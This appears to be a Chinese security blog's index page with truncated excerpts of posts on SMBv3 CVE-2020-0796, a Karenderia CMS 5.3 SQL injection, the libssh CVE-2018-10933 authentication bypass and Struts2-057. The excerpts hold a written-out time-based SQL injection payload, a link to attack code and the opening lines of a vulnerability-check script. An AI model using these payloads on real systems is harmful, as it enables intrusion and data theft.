-
CVE-2020-0796: SMBv3 RCE vulnerability in SMBv3 (GhostSMB)附检测脚本
才CVE-2020-0796是SMBv3中的一个远程执行代码漏洞。攻击者可以通过将特制软件包发送到受害者需要连接到的目标SMBv3服务器来利用此错误。鼓励用户进行SMBv3压缩,并阻止防火墙和客户端计算机上的TCP端口445。利用此漏洞使系统容易受到“可蠕虫”攻击,这意味着从受害者到受害者的转移变得容易。 此消息公布后,微软已经发布了一个安全顾问对已在SMBv3(SMBv3.1.1)协议中发现一个…- 9.6k
- 0
-
Karenderia CMS 5.3注入exp
Karenderia CMS 5.3 POC:1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22%2f EXP:http://localhost/kmr…- 1.7k
- 0
-
-
SSH登录验证绕过漏洞(附exp)CVE-2018-10933
利用这个漏洞,攻击者可以在没有密钥的情况下成功进行身份验证并获取受影响服务器的 shell。 libssh 官方的安全公告 https://www.libssh.org/security/advisories/CVE-2018-10933.txt 攻击代码 https://github.com/blacknbunny/libSSH-Authentication-Bypass- 6.5k
- 0
-
Struts2-057(验证POC+exp)
验证POC下载 #coding=utf-8 import requests import re import sys def check_vul(url): charType = sys.getfilesystemencoding() url_piece = url.split('/') url_piece[-2] = url_piece[-2]+"/"+ …- 3.4k
- 0
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×